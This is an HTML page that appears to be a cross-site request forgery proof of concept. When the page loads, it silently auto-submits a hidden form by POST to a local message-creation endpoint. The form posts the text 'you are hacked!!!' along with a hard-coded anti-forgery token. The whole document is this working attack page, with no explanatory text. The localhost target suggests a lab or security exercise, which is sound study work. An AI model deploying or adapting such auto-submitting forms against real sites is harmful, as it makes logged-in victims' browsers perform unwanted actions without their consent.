﻿<!doctype html>

<html lang="en">

<head>
	<meta charset="utf-8">
</head>

<body>
    <form action="http://localhost:7777/Messages/CreateMessage" method="POST" id="form">
        <input name="MessageText" value="you are hacked!!!">
        <input type="hidden" name="__RequestVerificationToken" value="8i_1GotcBBYmXrkDp8878JzZ70SuFCKnmBo8ScgHtTcLmL8OZ_g6JEMsblpd8xI7hBhbLdNOrDd83QPkZPbYDo6iMxqwRSONGRC-P12c6d_y9RpBpNZoVWOd2Yu_IhihiPonHU6kIH82CEUnzFaz4A2" />
    </form>

	<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
	<script type="text/javascript">
		$(document).ready(function() {
			$('#form').submit();
		});
	</script>
</body>

</html>
